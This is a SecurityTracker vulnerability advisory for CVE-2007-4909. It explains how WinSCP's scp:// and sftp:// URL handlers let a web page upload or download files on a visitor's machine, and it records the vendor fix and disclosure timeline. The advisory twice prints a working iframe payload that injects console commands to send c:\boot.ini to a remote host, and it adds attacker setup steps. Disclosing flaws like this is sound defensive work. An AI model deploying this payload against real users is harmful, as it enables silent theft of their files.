SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   WinSCP Vendors:   winscp.sourceforge.net
WinSCP URL Protocol Handlers Let Remote Users Upload/Download Arbitrary Files
SecurityTracker Alert ID:  1018697
SecurityTracker URL:  http://securitytracker.com/id/1018697
CVE Reference:   CVE-2007-4909   (Links to External Site)
Updated:  Apr 18 2008
Original Entry Date:  Sep 17 2007
Impact:   Disclosure of system information, Disclosure of user information, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 4.0.3 and prior versions
Description:   A vulnerability was reported in WinSCP. A remote user can cause arbitrary files to be uploaded or downloaded.

A remote user can create specially crafted HTML that, when loaded by the target user, will cause an arbitrary files on the target user's system to be uploaded to a remote server. Similarly, the remote user can cause arbitrary files to be downloaded to the target user's system.

The HTML can invoke the 'scp://' and 'sftp://' URL protocol handlers.

A demonstration exploit is provided:

<iframe src='scp:password@yourhost.com:" /console /command "option confirm off" "put c:\boot.ini" close exit "'/>

The vendor was notified on July 24, 2007.



Impact:   A remote user can retrieve arbitrary files from the target user's system or download arbitrary files to the target user's system.
Solution:   The vendor has issued a fixed version (4.0.4), available at:

http://winscp.net/eng/download.php

The vendor's advisory is available at:

http://winscp.net/eng/docs/history#4.0.4

Vendor URL:  winscp.net/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  WinSCP < 4.04 url protocol handler flaw

-Affected products: WinSCP 4.03 and older

-Details:
By default WinSCP installs url protocol handlers for the scp:// and sftp:// protocols.
These could be used by malicious web content to automatically upload any file from the local system to a remote server, or automatically
  download files from a remote server to the local system.

Since version 3.8.2 there is a sort of protection against this, but this does not stop all forms of attack.

-PoC:
On a machine you control set up an scp-only account with the username "scp" with any password.
Place this on a website:
<iframe src='scp:password@yourhost.com:" /console /command "option confirm off" "put c:\boot.ini" close exit "'/>
This will upload a file to the server when the page is visited by a user with a vulnerable WinSCP installed.

Downloading a file from the server to any location writable by the current user also works.

-Tested on:
IE6 & IE7 works.
FF older than 2.0.0.5 works.
FF 2.0.0.5 and newer show a confirmation dialog before executing WinSCP.

-Solution
Upgrade to version 4.04 or higher from http://winscp.net/download.php

-Timeline
24-Jul-2007 Vulnerability reported to Martin Prikryl
25-07-2007 Proposed fix to Martin
31-07-2007 Response from Martin
01-09-2007 Martin confirms fix
02-09-2007 New version done
06-09-2007 WinSCP v4.04 released




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC